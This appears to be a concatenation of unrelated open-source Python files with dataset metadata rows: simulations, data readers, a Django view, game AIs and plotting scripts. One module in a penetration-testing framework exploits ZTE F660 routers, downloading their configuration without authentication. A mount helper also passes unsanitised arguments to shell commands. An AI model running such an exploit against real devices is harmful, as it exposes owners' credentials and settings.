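# lifespan; tradeoff_reverse_logistic(rls) is a decreasing function of rls, i.e. a
# longevity/growth trade-off.
#   assert 0.99 < senesce_simple(0, 50) <= 1.0
#   assert senesce_simple(25, 50) < 0.51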
def output(iD, sD, rD, sim, ct, r):
IndIDs, SpIDs = [], []
for k, v in iD.items():
IndIDs.append(k)
SpIDs.append(v['sp'])
#pp(IndIDs)
#pp(SpIDs)
N = len(IndIDs)
R = len(rD.items())
S = len(list(set(SpIDs)))
#RLSL=[]
#for i in IndIDs:
# RLSL.append(iD[i]['rls'])
RLSL=[iD[i]['rls'] for i in IndIDs]
rlsmean = np.mean(RLSL)
rlsvar = np.var(RLSL)
if N > 0:
#OUT = open(GenPath + 'SimData.csv', 'a')
OUT=open("/gpfs/home/r/z/rzmogerr/Carbonate/SSTOSIMPLE.csv","a")
outlist = [sim, r, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, ct, rlsmean, rlsvar, N, S]
outlist = str(outlist).strip('[]')
outlist = outlist.replace(" ", "")
print>>OUT, outlist
OUT.close()
try:
print 'sim:', '%3s' % sim, 'ct:', '%3s' % ct,' N:', '%4s' % N, ' S:', '%4s' % S, ' R:', '%4s' % R, 'LSm:' '%1s' % rlsmean, 'LSv:' '%2s' % rlsvar
except UnboundLocalError:
print 'ERROR: N=0'
return
def immigration(sD, iD, ps, sd=1):
r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps
for j in range(sd):
if sd == 1 and np.random.binomial(1, u) == 0: continue
p = np.random.randint(1, 1000)
if p not in sD:
sD[p] = {'gr' : 10**np.random.uniform(gr, 0)}
sD[p]['mt'] = 10**np.random.uniform(mt, 0)
sD[p]['rls'] = 50#randint(rls_min,rls_max)
sD[p]['grcv']=10**np.random.uniform(-6.01,grcv)
sD[p]['mtcv']=10**np.random.uniform(-6.01,mtcv)
sD[p]['rlscv']=.15#10**np.random.uniform(-6.01,rlscv)
sD[p]['efcv']=10**np.random.uniform(-6.01,efcv)
es = np.random.uniform(1, 100, 3)
sD[p]['ef'] = es/sum(es)
sD[p]['a']=a
ID = time.time()
iD[ID] = copy.copy(sD[p])
iD[ID]['sp'] = p
iD[ID]['age']=np.random.geometric(.5)-1
#iD[ID]['age']=0#doesn't need to start with age==0...
iD[ID]['x'] = 0
iD[ID]['y'] = 0
iD[ID]['rls']=sD[p]['rls']; iD[ID]['mt']=sD[p]['mt']; iD[ID]['ef']=sD[p]['ef'];iD[ID]['gr']=sD[p]['gr'];iD[ID]['a']=sD[p]['a']
iD[ID]['q'] = 10**np.random.uniform(0, q)
return [sD, iD]
def consume(iD, rD, ps):
r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps
keys = list(iD)
shuffle(keys)
for k in keys:
if len(list(rD)) == 0: return [iD, rD]
c = choice(list(rD))
e = iD[k]['ef'][rD[c]['t']] * iD[k]['q']#why does this dep on the indiv's q?
#pp(iD[k]['ef'][rD[c]['t']])
#pp(e)
#To account for the Frenk et al. 2017, one idea that you had was to make the indiv a generalist by taking a max of
#iD[k]['ef'][rD[c]['t']] and another number (e.g., (1/3))
#but it would be better to do some distrn that has age as a param, so that it is generalizable and can be randomized.
iD[k]['q'] += min([rD[c]['v'], e])
rD[c]['v'] -= min([rD[c]['v'], e])
if rD[c]['v'] <= 0: del rD[c]
return [iD, rD]
def grow(iD):
for k, v in iD.items():
m = v['mt']
iD[k]['q'] -= v['gr'] * (v['q'])
if v['age']==0 and v['q'] < m/(0.5+v['a'])*(0.5-v['a']):#daughters are born in G0 phase,we know that
#theyre smaller in G0. We don't want to kill them all because of it, though
del iD[k]
elif v['q'] < m:
del iD[k]
return iD
def maintenance(iD):#mt is less for juveniles
for k, v in iD.items():
if v['age']==0:
iD[k]['q'] -= v['mt']/(0.5+v['a'])*(0.5-v['a'])
if v['q'] < v['mt']/(0.5+v['a'])*(0.5-v['a']): del iD[k]
else:
iD[k]['q'] -= v['mt']
if v['q'] < v['mt']: del iD[k]
return iD
def reproduce(sD, iD, ps, p = 0):
for k, v in iD.items():
if v['gr'] > 1 or v['gr'] < 0:
del iD[k]
elif v['q'] > v['mt']/(0.5+v['a']) and np.random.binomial(1, v['gr']) == 1:
if v['age'] >= v['rls'] or v['mt']<0:
del iD[k]
else:
iD[k]['q'] = v['q']*(0.5+v['a'])
grorig=(v['gr'])/(senesce_simple(v['age'],v['rls']))
iD[k]['gr']=v['gr']/(senesce_simple((v['age']-1),v['rls']))*(senesce_simple(v['age'],v['rls']))
#modifier based on the newly incremented age value, after removing the gr reduction due to previous age
#in full implementation the sscnc model will be chosen at random from a list of choices
i = time.time()
iD[i] = copy.deepcopy(iD[k])
iD[k]['age']+=1
#in addition to copying physiology, need to copy the rlsmax---
#rlsmax is determined genetically so there should be a chance of mutation, here with normally distributed
#effect sizes
iD[i]['rls']=np.random.normal((v['rls']),sD[v['sp']]['rlscv']*v['rls'],None)
#pp(iD[k]['age']);pp(iD[k]['rls'])
try:
iD[i]['gr']=np.random.normal(grorig,(sD[v['sp']]['grcv']*grorig),None)#these should not be normal distrns, should be negv-biased
iD[i]['mt']=np.random.normal(v['mt'],sD[v['sp']]['mtcv']*v['mt'],None)
#is total ef allowed to != 1
except ValueError:
del iD[i]; continue
if iD[i]['gr'] > 1 or iD[i]['gr'] < 0:
del iD[i]; continue
iD[i]['q']=(v['q'])/(0.5+v['a'])*(0.5-v['a'])
iD[i]['age']=0
return [sD, iD]
def iter_procs(iD, sD, rD, ps, ct):
procs = range(6)
shuffle(procs)
for p in procs:
if p == 0: rD = ResIn(rD, ps)
elif p == 1: pass#sD, iD = immigration(sD, iD, ps)
elif p == 2: iD, rD = consume(iD, rD, ps)
elif p == 3: iD = grow(iD)
elif p == 4: iD = maintenance(iD)
elif p == 5: sD, iD = reproduce(sD, iD, ps)
N = len(list(iD))
return [iD, sD, rD, N, ct+1]
def ResIn(rD, ps):
r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps
for i in range(r):
p = np.random.binomial(1, u)
if p == 1:
ID = time.time()
rD[ID] = {'t' : randint(0, 2)}
rD[ID]['v'] = 10**np.random.uniform(0, 2)
return rD
def run_model(sim, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a=0, rD = {}, sD = {}, iD = {}, ct = 0, splist2 = []):
print '\n'
rD={};iD={};sD={}
if iD=={} and sD=={} and rD=={}:
pass
else:
sys.exit()
r = choice([10,100])#10**randint(0, 2)
u = 10**np.random.uniform(-2, 0)
ps = r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a
sD, iD = immigration(sD, iD, ps, 1000)#this is the initial number of indivs
while ct < 2000:#this is the number of timesteps
if ct < 1:
print str(rls_min) + ' ' + str(rls_max) + " " + str(r)
iD, sD, rD, N, ct = iter_procs(iD, sD, rD, ps, ct)
if (ct > 1400 and ct%100 == 0) or (ct == 1):
output(iD, sD, rD, sim, ct, r)
for sim in range(500):#number of different models run (had been set at 10**6)
seed(time.time())
gr = np.random.uniform(-2,-1)
mt = np.random.uniform(-2,-1)
rls_min = randint(1,10)
rls_max = randint(rls_min,100)
grcv = np.random.uniform(-6,-0.3)
mtcv = np.random.uniform(-6,-0.3)
rlscv = np.random.uniform(-6,-0.3)
efcv = np.random.uniform(-6,-0.3)
q = choice([1, 2])
a=.35#a can take values [0,0.5)
run_model(sim, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a)
| gpl-3.0 | 237,521,331,691,269,800 | 37.186957 | 159 | 0.511784 | false | 2.596984 | false | false | false |
jhorey/ferry | ferry/data/dockerfiles/hadoop-client/mounthelper.py | 1 | 1115 | import json
import os
import sys
import logging
from subprocess import Popen, PIPE
def mkdir(directory):
if not os.path.isdir(directory):
cmd = 'mkdir -p %s' % directory
Popen(cmd, shell=True)
def mount(entry_point, mount_point):
# Check if the mount point exists. If not
# go ahead and create it.
# mount -t glusterfs entry_point mount_point
cmd = 'mount -t glusterfs %s %s' % (entry_point,
mount_point)
output = Popen(cmd, stdout=PIPE, shell=True).stdout.read()
logging.info(cmd)
logging.info(output)
def umount(mount_point):
cmd = 'cat /etc/mtab | grep /service/data | awk \'{print $2}\''
output = Popen(cmd, stdout=PIPE, shell=True).stdout.read()
if output.strip() != "":
cmd = 'umount %s' % mount_point
output = Popen(cmd, stdout=PIPE, shell=True).stdout.read()
logging.info(cmd)
logging.info(output)
cmd = sys.argv[1]
if cmd == "mount":
entry = sys.argv[2]
mkdir('/service/data')
mount(entry, '/service/data')
elif cmd == "umount":
umount('/service/data')
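# Illustrative command lines (host and volume names are hypothetical):
#   python mounthelper.py mount gluster-node:/ferry-vol   -> mounts the volume on /service/data
#   python mounthelper.py umount                          -> unmounts /service/data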
| apache-2.0 | -3,390,376,736,842,846,700 | 29.135135 | 67 | 0.609865 | false | 3.348348 | false | false | false |
PySimulator/PySimulator | PySimulator/Plugins/SimulationResult/Csv/Csv.py | 1 | 4603 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright (C) 2011-2015 German Aerospace Center DLR
(Deutsches Zentrum fuer Luft- und Raumfahrt e.V.),
Institute of System Dynamics and Control
All rights reserved.
This file is part of PySimulator.
PySimulator is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PySimulator is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with PySimulator. If not, see www.gnu.org/licenses.
'''
import csv, numpy, collections
from .. import IntegrationResults
fileExtension = 'csv'
description = 'Comma Separated Values for FMI Compliance Checker'
class Results(IntegrationResults.Results):
''' Class for hosting simulation results in csv format:
First row: Names of variables
First column: Independent variable, e.g. Time
Example:
    Time,Mechanical.Inertia.J,y,Mechanical.Inertia.w
0.0,20.0,3.6820238572822689e-4,0.0
0.1,20.0,6.7829872398723383e-4,0.7293789273984797e-2
0.2,20.0,4.0290389058209473e-3,0.7823794579232536e-1
'''
def __init__(self, fileName):
IntegrationResults.Results.__init__(self)
self.fileName = fileName # File name of result file
''' Load file
'''
'''
csvfile = open(self.fileName, 'rb')
reader = csv.reader(csvfile, delimiter=';')
self._name = reader.next() # first row contains the variable names
self._data = numpy.array(reader.next(), dtype='float64')
i=0
for row in reader:
self._data = numpy.row_stack((self._data, numpy.array(row, dtype='float64')))
print i
i=i+1
csvfile.close()
'''
csvfile = open(self.fileName, 'rb')
dialect = csv.Sniffer().sniff(csvfile.readline())
csvfile.seek(0)
reader = csv.reader(csvfile, dialect)
self._name = reader.next() # first row contains the variable names
self._info = len(self._name) * ['']
self._filterName()
data = numpy.loadtxt(csvfile, delimiter=dialect.delimiter)
t = data[:, 0]
self.timeSeries.append(IntegrationResults.TimeSeries(t, data, "linear"))
self.nTimeSeries = len(self.timeSeries)
csvfile.close()
self.isAvailable = True # Shows, if there is a file available to be read
def _filterName(self):
for i in xrange(len(self._name)):
x = self._name[i]
k = x.find('=')
if k > -1: # Skip the parts behind "="
self._info[i] = x[k:]
x = x[:k]
if len(x) > 5: # Convert der(a.b.c.d) to a.b.c.der(d)
if x[:4] == 'der(':
k = x.rfind('.')
if k > -1:
x = x[4:k] + '.der(' + x[k + 1:]
self._name[i] = x
def readData(self, variableName):
nameIndex = self._name.index(variableName)
if nameIndex < 0:
return None, None, None
y = self.timeSeries[0].data[:, nameIndex]
t = self.timeSeries[0].independentVariable
method = self.timeSeries[0].interpolationMethod
return t, y, method
def data(self, variableName):
nameIndex = self._name.index(variableName)
if nameIndex < 0:
return None
return self.timeSeries[0].data[:, nameIndex]
def getVariables(self):
# Generate the dict
variables = dict()
# Fill the values of the dict
for i in xrange(len(self._name)):
name = self._name[i]
variability = 'continuous'
value = None
infos = collections.OrderedDict()
infos['Variability'] = variability
if not self._info[i] == '':
infos['Description'] = self._info[i]
unit = None
seriesIndex = 0
column = i
sign = 1
variables[name] = IntegrationResults.ResultVariable(value, unit, variability, infos, seriesIndex, column, sign)
return variables
def getFileInfos(self):
# No relevant file infos stored in a csv result file
return dict()
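# Illustrative use (the file name is hypothetical; any csv file in the format shown in
# the Results docstring will do):
#   res = Results('Rectifier_res.csv')
#   t, y, method = res.readData('Mechanical.Inertia.w')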
| lgpl-3.0 | 7,949,613,338,050,799,000 | 30.513699 | 123 | 0.599652 | false | 3.830974 | false | false | false |
MIREL-UNC/mirel-scripts | preprocess/22_add_high_level_classes.py | 1 | 1652 | """Add the high level classes (person/organization/etc.) to a label file."""
import argparse
import pickle
from tqdm import tqdm
def read_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('--labels_file',
type=unicode,
help='Pickled file with a list of labels')
parser.add_argument('--mapping_file',
type=unicode,
                        help='Pickled file with the mapping from yago labels '
'to high level labels')
return parser.parse_args()
def pickle_from_file(filename):
with open(filename, 'r') as input_file:
result = pickle.load(input_file)
return result
def main():
args = read_arguments()
print 'Reading arguments'
labels = pickle_from_file(args.labels_file)
mapping = pickle_from_file(args.mapping_file)
print 'Processing labels'
for index, label in tqdm(enumerate(labels)):
if len(label) != 5:
print 'Malformed label at index {}'.format(index)
continue
if label[0].startswith('O'):
continue
yago_category = label[1].replace('I-', '').replace('B-', '')
if not yago_category in mapping:
print 'Error, unknown yago category {}'.format(yago_category)
continue
high_level_category = label[1][0] + '-' + mapping[yago_category]
labels[index] = label[:3] + (high_level_category, ) + label[4:]
print 'Saving results'
with open(args.labels_file, 'w') as output_file:
pickle.dump(labels, output_file)
if __name__ == '__main__':
main()
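# Illustrative invocation (the pickle file names are hypothetical):
#   python 22_add_high_level_classes.py --labels_file labels.pickle \
#       --mapping_file yago_to_high_level.pickle
# The labels file is rewritten in place, with the fourth element of every 5-tuple
# label replaced by its B-/I- prefixed high level category.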
| bsd-3-clause | -9,118,652,511,027,232,000 | 29.592593 | 77 | 0.585351 | false | 4.03912 | false | false | false |
itamaro/home-control-RPC | HomeControlRPC/cam/views.py | 1 | 1024 | import logging
import json
import sys
import tempfile
from mimetypes import guess_type
from django.http import HttpResponse
from django.conf import settings
from cam.models import WebCam, is_file_image
logger = logging.getLogger(__name__)
def get_snapshot(request):
"Take a webcam snapshot and return it as HTTP response"
content_type = 'application/json'
body = json.dumps('Failed snapshot')
# Try every available WebCam object to take the snapshot,
# until the first one that succeeds
for cam in WebCam.objects.all().order_by('priority'):
logger.debug('Attempting saveSnapshot with %s' % (cam))
snapshot_file = cam.saveSnapshot()
if snapshot_file and is_file_image(snapshot_file):
content_type, _ = guess_type(snapshot_file)
if content_type:
body = open(snapshot_file, 'rb').read()
break
else:
content_type = 'application/json'
return HttpResponse(body, content_type=content_type)
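# Hypothetical URL wiring (the project's urls.py is not part of this file; names are
# illustrative only):
#   from django.conf.urls import url
#   from cam import views
#   urlpatterns = [url(r'^cam/snapshot/$', views.get_snapshot)]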
| apache-2.0 | -4,536,109,680,444,750,300 | 33.133333 | 63 | 0.668945 | false | 4.129032 | false | false | false |
lucasdnd/2048-ai | ai.py | 1 | 2810 | import random
class _AI:
def get_command_letter(self, command):
if command == 0:
return "w"
elif command == 1:
return "a"
elif command == 2:
return "s"
else:
return "d"
class RandomAI(_AI):
def __init__(self):
self.name = "random_ai"
def get_next_command(self, available_commands):
self.current_command = random.randint(0, 3)
return self.get_command_letter(self.current_command)
class DirectionAI(_AI):
def __init__(self):
self.name = "direction_ai"
def get_next_command(self, available_commands):
if available_commands["s"]: # Prefer "down" movements
return "s"
elif available_commands["a"]: # Then "left"
return "a"
elif available_commands["d"]: # Then "right"
return "d"
else: # Only move "up" if no others are available
return "w"
class PairCheckAI(_AI):
def __init__(self):
self.name = "pair_check_ai"
self.direction_points = {"w": 0, "a": 0, "s": 0, "d": 0}
def get_next_command(self, available_commands):
# Check which direction to move
# print("calculating points for board:")
h_points = self.calc_points(self.board)
rotated_board = self.rotate_board(self.board)
v_points = self.calc_points(rotated_board)
# No points, return a random direction
if h_points == 0 and v_points == 0:
# print("nothing, random movement")
return self.get_command_letter(random.randint(0, 3))
# print("h: " + str(h_points))
# print("v: " + str(v_points))
# Up/down and left/right scores are the same
self.direction_points["w"] = v_points
self.direction_points["a"] = h_points
self.direction_points["s"] = v_points
self.direction_points["d"] = h_points
dir_letter = max(self.direction_points, key=self.direction_points.get)
# print("moving: " + dir_letter)
return dir_letter
def update_board(self, board):
self.board = board
# Calculates the number of points in each row
def calc_points(self, board):
# self.print_board(board)
total_score = 0
for row in board:
score = 0
for n in row:
if n == 0:
pass
elif score == 0:
score = n
elif score != n:
score = n
elif score == n:
# will_score = True
score *= 2
total_score += score
score = 0
return total_score
# Rotates the board
def rotate_board(self, board):
row_size = len(board)
board_size = row_size ** 2
rotated = []
for i in range(0, row_size):
rotated.append([])
for i in range(0, board_size):
rotated[i / row_size].append(board[i % row_size][i / row_size])
return rotated
def print_board(self, board):
for i in board:
print(i)
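if __name__ == '__main__':
    # Small illustrative run (not part of the game): feed PairCheckAI a hand-made
    # board and ask for a move. The board layout and command dict are made up, and,
    # like rotate_board itself, this assumes Python 2 integer division.
    demo_board = [[2, 2, 0, 0],
                  [0, 4, 4, 0],
                  [0, 0, 0, 0],
                  [0, 0, 0, 2]]
    ai = PairCheckAI()
    ai.update_board(demo_board)
    print(ai.get_next_command({"w": True, "a": True, "s": True, "d": True}))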
| gpl-2.0 | -3,631,155,268,515,528,700 | 24.779817 | 77 | 0.588968 | false | 3.431013 | false | false | false |
j91321/rext | modules/exploits/zte/f660_config_download.py | 1 | 2035 | # Name:ZTE F660 remote config download
# File:f660_config_download.py
# Author:Ján Trenčanský
# License: GNU GPL v3
# Created: 25.12.2015
# Last modified: 25.12.2015
# Shodan Dork:
# Description: ZTE F660 firmware Version: 2.22.21P1T8S does not check Cookies And Credentials on POST
# Based on: https://www.exploit-db.com/exploits/36978/
import core.Exploit
import core.io
import requests
from interface.messages import print_error, print_success, print_warning, print_info
class Exploit(core.Exploit.RextExploit):
"""
Name:ZTE F660 remote config download
File:f660_config_download.py
Author:Ján Trenčanský
License: GNU GPL v3
Created: 25.12.2015
Description: ZTE F660 firmware Version: 2.22.21P1T8S does not check Cookies And Credentials on POST
Based on: https://www.exploit-db.com/exploits/36978/
Options:
Name Description
host Target host address
port Target port
"""
def __init__(self):
core.Exploit.RextExploit.__init__(self)
def do_run(self, e):
url = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (self.host, self.port)
try:
print_warning("Sending exploit")
# It took me longer than necessary to find out how to use Content-Disposition properly
# Always set stream=True otherwise you may not get the whole file
response = requests.post(url, files={'config': ''}, timeout=60, stream=True)
if response.status_code == 200:
if response.headers.get('Content-Disposition'):
print_success("got file in response")
print_info("Writing file to config.bin")
core.io.writefile(response.content, "config.bin")
print_success("you can now use decryptors/zte/config_zlib_decompress to extract XML")
except requests.ConnectionError as e:
print_error("connection error %s" % e)
except requests.Timeout:
print_error("timeout")
Exploit()
| gpl-3.0 | -4,303,776,654,742,305,000 | 35.232143 | 107 | 0.663381 | false | 3.547203 | true | false | false |
aayushkapadia/chemical_reaction_simulator | MainFrame.py | 1 | 3865 | import ReactionMaker.inversion as inversion
import ReactionMaker.duplicate as duplicate
import ReactionMaker.increment as increment
import ReactionMaker.decrement as decrement
import ReactionMaker.multiply as multiply
import ReactionMaker.logarithm as logarithm
import ReactionMaker.power as power
import Simulator.XMLParser as XMLParser
def getHistoryFileName(xmlFileName):
y = xmlFileName[:-3]
return 'history_' + y + 'txt'
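# For example (file name is illustrative): getHistoryFileName('multiply_result.xml')
# returns 'history_multiply_result.txt'.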
def printWelcomeMessage():
print "Welcome to the Chemical Computer world!!"
def executeInversion():
var = raw_input("Enter the value you want to invert: ")
return inversion.execute(var)
def executeDuplicate():
var = raw_input("Enter the value you want to duplicate: ")
return duplicate.execute(var)
def executeDecrement():
var = raw_input("Enter the value you want to decrement: ")
return decrement.execute(var)
def executeIncrement():
var = raw_input("Enter the value you want to increment: ")
return increment.execute(var)
def executeMultiply():
input1 = raw_input("Enter the value of input 1: ")
input2 = raw_input("Enter the value of input 2: ")
return multiply.execute(input1,input2)
def executeLogarithm():
var = raw_input("Enter the value you want to take logarithm of: ")
return logarithm.execute(var)
def executePower():
input1 = raw_input("Enter the value of base: ")
input2 = raw_input("Enter the value of exponent: ")
return power.execute(input1,input2)
def showMainMenu():
print "Enter your choice here: "
print "1: Basic Functions"
print "2: Advanced Functions"
print "3: Exit"
def showBasicFunctionsMenu():
print "Select any one of the below basic function"
print "1: Inversion"
print "2: Duplication/Copy"
print "3: Decrementation"
print "4: Incrementation"
def showAdvancedFunctionsMenu():
print "Select any one of the below advanced function"
print "1: Multiplication"
print "2: Logarithm"
print "3: Power"
def showInvalidMessageAndQuit():
print "Please select only one of the given choice"
print "Quitting the Chemical World ..."
quit()
def plotResults(xmlFile,chemicalList,timeOfSimulation):
historyFile = getHistoryFileName(xmlFile)
sim = XMLParser.getSimulator(xmlFile)
sim.simulate(timeOfSimulation,historyFile)
sim.plot(chemicalList)
def executeBasicFunction(userChoice):
outputFileName = ''
chemicalList = []
if userChoice == 1:
outputFileName,chemicalList = executeInversion()
elif userChoice == 2:
outputFileName,chemicalList = executeDuplicate()
elif userChoice == 3:
outputFileName,chemicalList = executeDecrement()
elif userChoice == 4:
outputFileName,chemicalList = executeIncrement()
else:
showInvalidMessageAndQuit()
print 'Result File ' + outputFileName + ' Created'
timeOfSimulation = int(raw_input('Enter Time Of Simulation: '))
plotResults(outputFileName,chemicalList,timeOfSimulation)
def executeAdvancedFunction(userChoice):
outputFileName = ''
chemicalList = []
if userChoice == 1:
outputFileName,chemicalList = executeMultiply()
elif userChoice == 2:
outputFileName,chemicalList = executeLogarithm()
elif userChoice == 3:
outputFileName,chemicalList = executePower()
else:
showInvalidMessageAndQuit()
print 'Result File ' + outputFileName + ' Created'
timeOfSimulation = int(raw_input('Enter Time Of Simulation: '))
plotResults(outputFileName,chemicalList,timeOfSimulation)
def executeUserChoice(userChoice):
if userChoice == 1:
showBasicFunctionsMenu()
userChoice = int(input())
executeBasicFunction(userChoice)
elif userChoice == 2:
showAdvancedFunctionsMenu()
userChoice = int(input())
executeAdvancedFunction(userChoice)
elif userChoice == 3:
print "Quitting the Chemical World ..."
quit()
else:
showInvalidMessageAndQuit()
def main():
printWelcomeMessage()
while True:
print ""
showMainMenu()
userChoice = int(input())
executeUserChoice(userChoice)
main() | mit | 6,386,970,407,418,349,000 | 26.614286 | 67 | 0.760155 | false | 3.375546 | false | false | false |
mariomosca/damnvid | dLog.py | 12 | 2690 | # -*- coding: utf-8 -*-
import os, sys
import time
import traceback
from dCore import *
class DamnLog:
def __init__(self, logpath=None, stderr=True, flush=False, handleerrors=True, overrides={}):
DamnLog.instance = self
self.time = 0
self.streams = []
self.autoflush = flush
		self.overrides = dict(overrides)
if logpath is not None:
try:
if not os.path.exists(os.path.dirname(logpath)):
os.makedirs(os.path.dirname(logpath))
f = DamnOpenFile(logpath, 'wb')
self.streams.append(f)
f.write((self.getPrefix() + u'Log opened.').encode('utf8'))
except:
try:
print 'Warning: Couldn\'t open log file!'
traceback.print_exc()
except:
pass
if stderr:
self.streams.append(sys.stdout)
if handleerrors:
try:
sys.excepthook = self.logException
except:
self.log('!! Cannot override excepthook. This looks bad.')
def getPrefix(self):
t = int(time.time())
if self.time != t:
self.time = t
return u'[' + DamnUnicode(time.strftime('%H:%M:%S')) + u'] '
return u''
def write(self, message):
message = u'\r\n' + (self.getPrefix() + DamnUnicode(message.strip())).strip()
for s in self.streams:
try:
print >> s, message.encode('utf8'),
except:
try:
print 'Could not print to stream', s,'message:', message.strip()
except:
pass
if self.autoflush:
self.flush()
def log(self, *args):
import dCore
s = []
for i in args:
i = dCore.DamnUnicode(i)
for k in self.overrides.iterkeys():
i = i.replace(k, self.overrides[k])
s.append(i)
return self.write(u' '.join(s))
def logException(self, typ, value, tb):
import traceback
import dCore
import dLog
try:
info = traceback.format_exception(typ, value, tb)
e = []
for i in info:
e.append(dCore.DamnUnicode(i).strip())
self.log('!!',u'\n'.join(e))
except:
try:
self.log('!! Error while logging exception. Something is very wrong.')
except:
pass # Something is very, very wrong.
def flush(self):
for s in self.streams:
try:
s.flush()
except:
pass
try:
os.fsync(s)
except:
pass
def close(self):
self.log('Closing log.')
for s in self.streams:
if s != sys.stderr:
try:
s.close()
except:
pass
	def addOverride(self, target, replacement=u''):
self.overrides[DamnUnicode(target)] = DamnUnicode(replacement)
def Damnlog(*args):
if DamnLog.__dict__.has_key('instance'):
return DamnLog.instance.log(*args)
return None
def DamnlogException(*args):
if DamnLog.__dict__.has_key('instance'):
return DamnLog.instance.logException(*args)
return None
def DamnlogOverride(target, replacement=u''):
DamnLog.instance.addOverride(target, replacement)
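# Typical usage sketch (illustrative; the log file name is made up). One DamnLog
# instance is created at startup, then the module-level helpers are used everywhere:
#   DamnLog(logpath='damnvid.log', stderr=True, flush=True)
#   Damnlog('conversion started for', video_name)
#   DamnlogException(*sys.exc_info())   # from inside an except block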
| gpl-3.0 | -7,886,833,101,879,418,000 | 24.619048 | 93 | 0.646097 | false | 2.822665 | false | false | false |
MTgeophysics/mtpy | mtpy/uofa/simpleplotEDI.py | 1 | 3748 | #!/usr/bin/env python
import os
import sys
import os.path as op
import mtpy.core.edi as MTedi
def main():
fn = sys.argv[1]
if not op.isfile(fn):
print('\n\tFile does not exist: {0}\n'.format(fn))
sys.exit()
saveplot = False
if len(sys.argv) > 2:
arg2 = sys.argv[2]
if 's' in arg2.lower():
saveplot = True
fn = plotedi(fn, saveplot)
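# Command-line usage (illustrative file name):
#   python simpleplotEDI.py station01.edi      -> show the plot interactively
#   python simpleplotEDI.py station01.edi s    -> save the plot as PNG next to the EDI file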
def plotedi(fn, saveplot=False, component=None):
edi = MTedi.Edi()
try:
edi.readfile(fn)
except:
print('\n\tERROR - not a valid EDI file: {0}\n'.format(fn))
sys.exit()
# if saveplot is True:
# import matplotlib
# matplotlib.use('Agg')
import pylab
lo_comps = []
if component is not None:
try:
if 'n' in component.lower():
lo_comps.append('n')
except:
pass
try:
if 'e' in component.lower():
lo_comps.append('e')
except:
pass
if len(lo_comps) == 0:
lo_comps = ['n', 'e']
res_te = []
res_tm = []
phi_te = []
phi_tm = []
reserr_te = []
reserr_tm = []
phierr_te = []
phierr_tm = []
for r in edi.Z.resistivity:
res_te.append(r[0, 1])
res_tm.append(r[1, 0])
for p in edi.Z.phase:
phi_te.append(p[0, 1] % 90)
phi_tm.append(p[1, 0] % 90)
if pylab.np.mean(phi_te) > 90 and pylab.np.mean(phi_tm) > 90:
phi_te = [i % 90 for i in phi_te]
phi_tm = [i % 90 for i in phi_tm]
for r in edi.Z.resistivity_err:
reserr_te.append(r[0, 1])
reserr_tm.append(r[1, 0])
for p in edi.Z.phase_err:
phierr_te.append(p[0, 1])
phierr_tm.append(p[1, 0])
periods = 1. / edi.freq
resplotelement_xy = None
resplotelement_yx = None
axes = pylab.figure('EDI ' + fn)
ax1 = pylab.subplot(211)
if 'n' in lo_comps:
resplotelement_xy = pylab.errorbar(
periods, res_te, reserr_te, marker='x', c='b', fmt='x')
if 'e' in lo_comps:
resplotelement_yx = pylab.errorbar(
periods, res_tm, reserr_tm, marker='x', c='r', fmt='x')
pylab.xscale('log', nonposx='clip')
pylab.yscale('log', nonposy='clip')
    minval = min(pylab.min(res_te), pylab.min(res_tm))
    maxval = max(pylab.max(res_te), pylab.max(res_tm))
pylab.xlim(0.5 * pylab.min(periods), 2 * pylab.max(periods))
# ylim([0.1,100])
pylab.ylim([minval / 10, maxval * 10])
pylab.autoscale(False)
pylab.ylabel(r' $\rho$ (in $\Omega m$)')
pylab.setp(ax1.get_xticklabels(), visible=False)
# share x only
ax2 = pylab.subplot(212, sharex=ax1)
pylab.autoscale(False)
# ylim(-45,135)
if 'n' in lo_comps:
pylab.errorbar(periods, phi_te, phierr_te, marker='x', c='b', fmt='x')
if 'e' in lo_comps:
pylab.errorbar(periods, phi_tm, phierr_tm, marker='x', c='r', fmt='x')
pylab.ylabel('Phase angle ($\degree$)')
pylab.xlabel('Period (in s)')
pylab.plot([pylab.xlim()[0], pylab.xlim()[1]], [45, 45], '-.', c='0.7')
pylab.ylim([-0, 90])
ax1.legend([resplotelement_xy, resplotelement_yx], ['$E_{X}/B_Y$', '$E_Y/B_X$'], loc=2, ncol=1,
numpoints=1, markerscale=0.8, frameon=True, labelspacing=0.3,
prop={'size': 8}, fancybox=True, shadow=False)
pylab.tight_layout()
if saveplot is True:
pylab.ioff()
outfn = op.splitext(fn)[0] + '.png'
pylab.savefig(outfn, bbox_inches='tight')
pylab.close('all')
pylab.ion()
return outfn
else:
pylab.ion()
pylab.show(block=True)
return None
if __name__ == '__main__':
main()
| gpl-3.0 | 5,839,306,716,589,147,000 | 24.496599 | 99 | 0.534152 | false | 2.923557 | false | false | false |